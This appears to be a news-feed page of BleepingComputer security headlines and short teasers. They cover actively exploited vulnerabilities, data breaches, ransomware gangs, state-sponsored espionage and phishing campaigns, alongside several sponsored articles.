Category: Security

CISA orders feds to patch actively exploited Dell flaw within 3 days The U.S. Cybersecurity and Infrastructure Security Agency (CISA) ordered government agencies to patch their systems within three days against a maximum-severity Dell vulnerability that has been under active exploitation since mid-2024. […] Sergiu Gatlan Go to bleepingcomputer

Critical infra Honeywell CCTVs vulnerable to auth bypass flaw The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of a critical vulnerability in multiple Honeywell CCTV products that allows unauthorized access to feeds or account hijacking. […] Bill Toulas Go to bleepingcomputer

Telegram channels expose rapid weaponization of SmarterMail flaws Underground Telegram channels shared SmarterMail exploit PoCs and stolen admin credentials within days of disclosure. Flare explains how monitoring these communities reveals rapid weaponization of CVE-2026-24423 and CVE-2026-23760 tied to ransomware activity. […] Sponsored by Flare Go to bleepingcomputer

Data breach at fintech firm Figure affects nearly 1 million accounts Hackers have stolen the personal and contact information of nearly 1 million accounts after breaching the systems of Figure Technology Solutions, a self-described blockchain-native financial technology company. […] Sergiu Gatlan Go to bleepingcomputer

Flaws in popular VSCode extensions expose developers to attacks Vulnerabilities with high to critical severity ratings affecting popular Visual Studio Code (VSCode) extensions collectively downloaded more than 128 million times could be exploited to steal local files and execute code remotely. […] Bill Toulas Go to bleepingcomputer

Chinese hackers exploiting Dell zero-day flaw since mid-2024 A suspected Chinese state-backed hacking group has been quietly exploiting a critical Dell security flaw in zero-day attacks that started in mid-2024. […] Sergiu Gatlan Go to bleepingcomputer

Ireland now also investigating X over Grok-made sexual images Ireland’s Data Protection Commission (DPC), the country’s data protection authority, has opened a formal investigation into X over the use of the platform’s Grok artificial intelligence tool to generate non-consensual sexual images of real people, including children. […] Sergiu Gatlan Go to bleepingcomputer

Eurail says stolen traveler data now up for sale on dark web Eurail B.V., the operator that provides access to 250,000 kilometers of European railways, confirmed that data stolen in a breach earlier this year is being offered for sale on the dark web. […] Bill Toulas Go to bleepingcomputer

Man arrested for demanding reward after accidental police data leak Dutch authorities arrested a 40-year-old man after he downloaded confidential documents that had been mistakenly shared by the police and refused to delete them unless he received “something in return.” […] Sergiu Gatlan Go to bleepingcomputer

Canada Goose investigating as hackers leak 600K customer records ShinyHunters, a well-known data extortion group, claims to have stolen more than 600,000 Canada Goose customer records containing personal and payment-related data. Canada Goose told BleepingComputer the dataset appears to relate to past customer transactions and that it has not found evidence of a breach of…

New ClickFix attack abuses nslookup to retrieve PowerShell payload via DNS Threat actors are now abusing DNS queries as part of ClickFix social engineering attacks to deliver malware, making this the first known use of DNS as a channel in these campaigns. […] Lawrence Abrams Go to bleepingcomputer

CTM360: Lumma Stealer and Ninja Browser malware campaign abusing Google Groups CTM360 reports 4,000+ malicious Google Groups and 3,500+ Google-hosted URLs used to spread the Lumma Stealer infostealing malware and a trojanized “Ninja Browser.” The report details how attackers abuse trusted Google services to steal credentials and maintain persistence across Windows and Linux systems. […]…

One threat actor responsible for 83% of recent Ivanti RCE attacks Threat intelligence observations show that a single threat actor is responsible for most of the active exploitation of two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-21962 and CVE-2026-24061. […] Bill Toulas Go to bleepingcomputer

Snail mail letters target Trezor and Ledger users in crypto-theft attacks Threat actors are sending physical letters pretending to be from Trezor and Ledger, makers of cryptocurrency hardware wallets, to trick users into submitting recovery phrases in crypto theft attacks. […] Lawrence Abrams Go to bleepingcomputer

Claude LLM artifacts abused to push Mac infostealers in ClickFix attack Threat actors are abusing Claude artifacts and Google Ads in ClickFix campaigns that deliver infostealer malware to macOS users searching for specific queries. […] Bill Toulas Go to bleepingcomputer

Turning IBM QRadar Alerts into Action with Criminal IP Criminal IP now integrates with IBM QRadar SIEM and SOAR to bring external IP-based threat intelligence directly into detection and response workflows. See how risk scoring and automated enrichment help SOC teams prioritize high-risk IPs and accelerate investigations without leaving QRadar. […] Sponsored by Criminal IP…

Critical BeyondTrust RCE flaw now exploited in attacks, patch now A critical pre-authentication remote code execution vulnerability in BeyondTrust Remote Support and Privileged Remote Access appliances is now being exploited in attacks after a PoC was published online. […] Lawrence Abrams Go to bleepingcomputer

Crazy ransomware gang abuses employee monitoring tool in attacks A member of the Crazy ransomware gang is abusing legitimate employee monitoring software and the SimpleHelp remote support tool to maintain persistence in corporate networks, evade detection, and prepare for ransomware deployment. […] Lawrence Abrams Go to bleepingcomputer

New Linux botnet SSHStalker uses old-school IRC for C2 comms A newly documented Linux botnet named SSHStalker is using the IRC (Internet Relay Chat) communication protocol for command-and-control (C2) operations. […] Bill Toulas Go to bleepingcomputer

Malicious 7-Zip site distributes installer laced with proxy tool A fake 7-Zip website is distributing a trojanized installer of the popular archiving tool that turns the user’s computer into a residential proxy node. […] Bill Toulas Go to bleepingcomputer

Fugitive behind $73M ‘pig butchering’ scheme gets 20 years in prison A dual Chinese and St. Kitts and Nevis national was sentenced to 20 years in prison in absentia for his role in an international cryptocurrency investment scheme (also known as pig butchering or romance baiting) that defrauded victims of more than $73 million. […]…

Chinese cyberspies breach Singapore’s four largest telcos The Chinese threat actor tracked as UNC3886 breached Singapore’s four largest telecommunication service providers, Singtel, StarHub, M1, and Simba, at least once last year. […] Bill Toulas Go to bleepingcomputer

Hackers breach SmarterTools network using flaw in its own software SmarterTools confirmed last week that the Warlock ransomware gang breached its network after compromising an email system, but did not impact business applications or account data. […] Bill Toulas Go to bleepingcomputer

Hackers exploit SolarWinds WHD flaws to deploy DFIR tool in attacks Hackers are now exploiting SolarWinds Web Help Desk (WHD) vulnerabilities to gain code execution rights on exposed systems and deploy legitimate tools, including the Velociraptor forensics tools, for persistence and remote control. […] Bill Toulas Go to bleepingcomputer

Password guessing without AI: How attackers build targeted wordlists Attackers don’t need AI to crack passwords, they build targeted wordlists from an organization’s own public language. This article explains how tools like CeWL turn websites into high-success password guesses and why complexity rules alone fall short. […] Sponsored by Specops Software Go to bleepingcomputer

European Commission discloses breach that exposed staff data The European Commission is investigating a breach after finding evidence that its mobile device management platform was hacked. […] Sergiu Gatlan Go to bleepingcomputer

New tool blocks imposter attacks disguised as safe commands A new open-source and cross-platform tool called Tirith can detect homoglyph attacks over command-line environments by analyzing URLs in typed commands and stopping their execution.  […] Bill Toulas Go to bleepingcomputer

State actor targets 155 countries in ‘Shadow Campaigns’ espionage op A new state-aligned cyberespionage threat group tracked as TGR-STA-1030/UNC6619, has conducted a global-scale operation dubbed the “Shadow Campaigns,” where it targeted government infrastructure in 155 countries. […] Bill Toulas Go to bleepingcomputer

Payments platform BridgePay confirms ransomware attack behind outage A major U.S. payment gateway and solutions provider says a ransomware attack has knocked key systems offline, triggering a widespread outage affecting multiple services. The incident began on Friday and quickly escalated into a nationwide disruption across BridgePay’s platform. […] Ax Sharma Go to bleepingcomputer

Germany warns of Signal account hijacking targeting senior figures Germany’s domestic intelligence agency is warning of suspected state-sponsored threat actors targeting high-ranking individuals in phishing attacks via messaging apps like Signal. […] Bill Toulas Go to bleepingcomputer

CISA warns of SmarterMail RCE flaw used in ransomware attacks The Cybersecurity & Infrastructure Security Agency (CISA) in the U.S. has issued a warning about CVE-2026-24423, an unauthenticated remote code execution (RCE) flaw in SmarterMail that is used in ransomware attacks. […] Bill Toulas Go to bleepingcomputer

EDR, Email, and SASE Miss This Entire Class of Browser Attacks Many modern attacks happen entirely inside the browser, leaving little evidence for traditional security tools. Keep Aware shows why EDR, email, and SASE miss browser-only attacks and how visibility changes prevention. […] Sponsored by Keep Aware Go to bleepingcomputer

Flickr discloses potential data breach exposing users’ names, emails Photo-sharing platform Flickr is notifying users of a potential data breach after a vulnerability at a third-party email service provider exposed their real names, email addresses, IP addresses, and account activity. […] Sergiu Gatlan Go to bleepingcomputer

CISA orders federal agencies to replace end-of-life edge devices The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a new binding operational directive requiring federal agencies to identify and remove network edge devices that no longer receive security updates from manufacturers. […] Sergiu Gatlan Go to bleepingcomputer

Ransomware gang uses ISPsystem VMs for stealthy payload delivery Ransomware operators are hosting and delivering malicious payloads at scale by abusing virtual machines (VMs) provisioned by ISPsystem, a legitimate virtual infrastructure management provider. […] Bill Toulas Go to bleepingcomputer

Hackers compromise NGINX servers to redirect user traffic A threat actor is compromising NGINX servers in a campaign that hijacks user traffic and reroutes it through the attacker’s backend infrastructure. […] Bill Toulas Go to bleepingcomputer

Critical n8n flaws disclosed along with public exploits Multiple critical vulnerabilities in the popular n8n open-source workflow automation platform allow escaping the confines of the environment and taking complete control of the host server. […] Bill Toulas Go to bleepingcomputer

CISA: VMware ESXi flaw now exploited in ransomware attacks CISA confirmed on Wednesday that ransomware gangs have begun exploiting a high-severity VMware ESXi sandbox escape vulnerability that was previously used in zero-day attacks. […] Sergiu Gatlan Go to bleepingcomputer

CISA warns of five-year-old GitLab flaw exploited in attacks The U.S. Cybersecurity and Infrastructure Security Agency (CISA) ordered government agencies to patch their systems against a five-year-old GitLab vulnerability that is actively being exploited in attacks. […] Sergiu Gatlan Go to bleepingcomputer

The Double-Edged Sword of Non-Human Identities Leaked non-human identities like API keys and tokens are becoming a major breach driver in cloud environments. Flare shows how exposed machine credentials quietly grant attackers long-term access to enterprise systems. […] Sponsored by Flare Go to bleepingcomputer

New GlassWorm attack targets macOS via compromised OpenVSX extensions A new GlassWorm malware attack through compromised OpenVSX extensions focuses on stealing passwords, crypto-wallet data, and developer credentials and configurations from macOS systems. […] Bill Toulas Go to bleepingcomputer

Russian hackers exploit recently patched Microsoft Office bug in attacks Ukraine’s Computer Emergency Response Team (CERT) says that Russian hackers are exploiting CVE-2026-21509, a recently patched vulnerability in multiple versions of Microsoft Office. […] Bill Toulas Go to bleepingcomputer

Exposed MongoDB instances still targeted in data extortion attacks A threat actor is targeting exposed MongoDB instances in automated data extortion attacks demanding low ransoms from owners to restore the data. […] Bill Toulas Go to bleepingcomputer

Cloud storage payment scam floods inboxes with fake renewals Over the past few months, a large-scale cloud storage subscription scam campaign has been targeting users worldwide with repeated emails falsely warning recipients that their photos, files, and accounts are about to be blocked or deleted due to an alleged payment failure. […] Lawrence Abrams Go to…

Mandiant details how ShinyHunters abuse SSO to steal cloud data Mandiant says a wave of recent ShinyHunters SaaS data-theft attacks is being fueled by targeted voice phishing (vishing) attacks and company-branded phishing sites that steal single sign-on (SSO) credentials and multi-factor authentication (MFA) codes. […] Lawrence Abrams Go to bleepingcomputer

Crypto wallets received a record $158 billion in illicit funds last year Illegal cryptocurrency flows hit a record $158 billion in 2025, reversing a three-year trend of declining amounts from $86B in 2021 to $64B in 2024. […] Bill Toulas Go to bleepingcomputer

Ivanti warns of two EPMM flaws exploited in zero-day attacks Ivanti has disclosed two critical vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM), tracked as CVE-2026-1281 and CVE-2026-1340, that were exploited in zero-day attacks. […] Lawrence Abrams Go to bleepingcomputer

Match Group breach exposes data from Hinge, Tinder, OkCupid, and Match Match Group, the owner of multiple popular online dating services, Tinder, Match.com, Meetic, OkCupid, and Hinge, confirmed a cybersecurity incident that compromised user data. […] Bill Toulas Go to bleepingcomputer

Initial access hackers switch to Tsundere Bot for ransomware attacks A prolific initial access broker tracked as TA584 has been observed using the Tsundere Bot alongside XWorm remote access trojan to gain network access that could lead to ransomware attacks. […] Bill Toulas Go to bleepingcomputer

Cyberattack on Polish energy grid impacted around 30 facilities The coordinated attack on Poland’s power grid in late December targeted multiple distributed energy resource (DER) sites across the country, including combined heat and power (CHP) facilities and wind and solar dispatch systems. […] Bill Toulas Go to bleepingcomputer

eScan confirms update server breached to push malicious update MicroWorld Technologies, the maker of the eScan antivirus product, has confirmed that one of its update servers was breached and used to distribute an unauthorized update later analyzed as malicious to a small subset of customers earlier this month. […] Lawrence Abrams Go to bleepingcomputer

New sandbox escape flaw exposes n8n instances to RCE attacks Two vulnerabilities in the n8n workflow automation platform could allow attackers to fully compromise affected instances, access sensitive data, and execute arbitrary code on the underlying host. […] Bill Toulas Go to bleepingcomputer

Fortinet blocks exploited FortiCloud SSO zero day until patch is ready Fortinet has confirmed a new, actively exploited critical FortiCloud single sign-on (SSO) authentication bypass vulnerability, tracked as CVE-2026-24858, and says it has mitigated the zero-day attacks by blocking FortiCloud SSO connections from devices running vulnerable firmware versions. […] Lawrence Abrams Go to bleepingcomputer

Chinese Mustang Panda hackers deploy infostealers via CoolClient backdoor The Chinese espionage threat group Mustang Panda has updated its CoolClient backdoor to a new variant that can steal login data from browsers and monitor the clipboard. […] Bill Toulas Go to bleepingcomputer

WinRAR path traversal flaw still exploited by numerous hackers Multiple threat actors, both state-sponsored and financially motivated, are exploiting the CVE-2025-8088 high-severity vulnerability in WinRAR for initial access and to deliver various malicious payloads. […] Bill Toulas Go to bleepingcomputer

Nike investigates data breach after extortion gang leaks files Nike is investigating what it described as a “potential cyber security incident” after the World Leaks ransomware gang leaked 1.4 TB of files allegedly stolen from the sportswear giant. […] Sergiu Gatlan Go to bleepingcomputer

New malware service guarantees phishing extensions on Chrome web store A new malware-as-a-service (MaaS) called ‘Stanley’ promises malicious Chrome extensions that can clear Google’s review process and publish them to the Chrome Web Store. […] Bill Toulas Go to bleepingcomputer

New ClickFix attacks abuse Windows App-V scripts to push malware A new malicious campaign mixes the ClickFix method with fake CAPTCHA and a signed Microsoft Application Virtualization (App-V) script to ultimately deliver the Amatera infostealing malware. […] Bill Toulas Go to bleepingcomputer

Cloudflare misconfiguration behind recent BGP route leak Cloudflare has shared more details about a recent 25-minute Border Gateway Protocol (BGP) route leak affecting IPv6 traffic, which caused measurable congestion, packet loss, and approximately 12 Gbps of dropped traffic. […] Bill Toulas Go to bleepingcomputer

1Password adds pop-up warnings for suspected phishing sites The 1Password digital vault and password manager has added built-in protection against phishing URLs to help users identify malicious pages and prevent them from sharing account credentials with threat actors. […] Bill Toulas Go to bleepingcomputer

Sandworm hackers linked to failed wiper attack on Poland’s energy systems A cyberattack targeting Poland’s power grid in late December 2025 has been linked to the Russian state-sponsored hacking group Sandworm, which attempted to deploy a new destructive data-wiping malware dubbed DynoWiper during the attack.. […] Lawrence Abrams Go to bleepingcomputer

Konni hackers target blockchain engineers with AI-built malware The North Korean hacker group Konni (Opal Sleet, TA406) is using AI-generated PowerShell malware to target developers and engineers in the blockchain sector. […] Bill Toulas Go to bleepingcomputer

ShinyHunters claim to be behind SSO-account data theft attacks The ShinyHunters extortion gang claims it is behind a wave of ongoing voice phishing attacks targeting single sign-on (SSO) accounts at Okta, Microsoft, and Google, enabling threat actors to breach corporate SaaS platforms and steal company data for extortion. […] Lawrence Abrams Go to bleepingcomputer

CISA confirms active exploitation of four enterprise software bugs The Cybersecurity and Infrastructure Security Agency (CISA) in the U.S. warned of active exploitation of four vulnerabilities impacting enterprise software from Versa and Zimbra, the Vite frontend tooling framework, and the Prettier code formatter. […] Bill Toulas Go to bleepingcomputer

US to deport Venezuelans who emptied bank ATMs using malware South Carolina federal prosecutors announced that two Venezuelan nationals convicted of stealing hundreds of thousands of dollars from U.S. banks in an ATM jackpotting scheme will be deported after serving their sentences. […] Sergiu Gatlan Go to bleepingcomputer

Hackers exploit critical telnetd auth bypass flaw to get root A coordinated campaign has been observed targeting a recently disclosed critical-severity vulnerability that has been present in the GNU InetUtils telnetd server for 11 years. […] Bill Toulas Go to bleepingcomputer

Okta SSO accounts targeted in vishing-based data theft attacks Okta is warning about custom phishing kits built specifically for voice-based social engineering (vishing) attacks. BleepingComputer has learned that these kits are being used in active attacks to steal Okta SSO credentials for data theft. […] Lawrence Abrams Go to bleepingcomputer

Curl ending bug bounty program after flood of AI slop reports The developer of the popular curl command-line utility and library announced that the project will end its HackerOne security bug bounty program at the end of this month, after being overwhelmed by low-quality AI-generated vulnerability reports. […] Lawrence Abrams Go to bleepingcomputer

SmarterMail auth bypass flaw now exploited to hijack admin accounts Hackers began exploiting an authentication bypass vulnerability in SmarterTools’ SmarterMail email server and collaboration tool that allows resetting admin passwords. […] Bill Toulas Go to bleepingcomputer

INC ransomware opsec fail allowed data recovery for 12 US orgs An operational security failure allowed researchers to recover data that the INC ransomware gang stole from a dozen U.S. organizations. […] Bill Toulas Go to bleepingcomputer

Zendesk ticket systems hijacked in massive global spam wave People worldwide are being targeted by a massive spam wave originating from unsecured Zendesk support systems, with victims reporting receiving hundreds of emails with strange and sometimes alarming subject lines. […] Lawrence Abrams Go to bleepingcomputer